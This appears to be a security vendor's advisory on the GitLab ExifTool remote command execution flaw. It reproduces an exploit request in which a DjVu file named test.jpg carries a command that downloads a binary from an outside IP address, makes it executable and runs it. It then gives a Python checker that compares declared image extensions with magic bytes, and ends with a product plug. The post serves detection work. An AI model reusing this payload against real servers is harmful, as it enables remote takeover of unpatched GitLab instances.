GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in remote command execution.
Files uploaded with the extensions jpg, jpeg or tiff are passed to ExifTool to strip any unauthorised metadata tags. The issue is that ExifTool ignores the file extension and determines the file type from the content instead, so a file of a different format (such as the DjVu container in the sample below) can be submitted under an image extension and still be parsed as that other format.
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO... ......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44..... FORM....DJVIANTa...P(metadata (Copyright "\ " . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \ " b ") )
By turning this vulnerability into a traffic file and a matching rule, we are able to detect attempts to upload files whose content does not match the declared image extension and content type.
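The same mismatch check can be applied on the receiving side. The following is an added example written for this post, not Idappcom's signature or GitLab's own code: it reads the filename from a multipart part's headers and compares the declared extension with the file's leading magic bytes, flagging the DjVu signature ("AT&TFORM") seen in the request above. The function names and the two sample parts are constructed for illustration.

```python
import re

# Magic bytes for the extensions GitLab hands to ExifTool (jpg/jpeg/tiff),
# plus the DjVu container signature that appears in the sample request.
MAGIC = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "tiff": [b"II*\x00", b"MM\x00*"],
}
DJVU_MAGIC = b"AT&TFORM"

FILENAME_RE = re.compile(rb'filename="([^"]*)"')


def declared_extension(part_headers: bytes) -> str:
    """Lower-cased extension from the part's Content-Disposition filename ('' if none)."""
    m = FILENAME_RE.search(part_headers)
    if not m:
        return ""
    name = m.group(1).decode("utf-8", "replace")
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def content_matches_extension(ext: str, body: bytes) -> bool:
    """True only when the body starts with a magic number valid for the declared extension."""
    return any(body.startswith(sig) for sig in MAGIC.get(ext, []))


def classify_upload(part_headers: bytes, body: bytes) -> str:
    """Classify one multipart part: 'ok', 'content-mismatch', or a DjVu-specific verdict."""
    ext = declared_extension(part_headers)
    if ext not in MAGIC:
        return "not-image-extension"  # other extensions do not reach the ExifTool path
    if body.startswith(DJVU_MAGIC):
        return "djvu-disguised-as-" + ext
    if content_matches_extension(ext, body):
        return "ok"
    return "content-mismatch"


# Constructed sample parts (not captured traffic): a genuine JPEG header, and a
# DjVu container submitted as .jpg, modelled on the request shown above.
GOOD_JPEG = (b'Content-Disposition: form-data; name="file"; filename="photo.jpg"\r\n'
             b'Content-Type: image/jpeg\r\n', b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
FAKE_JPEG = (b'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
             b'Content-Type: image/jpeg\r\n', b"AT&TFORM\x00\x00\x00\x00DJVM")

if __name__ == "__main__":
    for hdr, body in (GOOD_JPEG, FAKE_JPEG):
        print(declared_extension(hdr), "->", classify_upload(hdr, body))
```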
Idappcom has created signature 8021990 along with a traffic file.
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional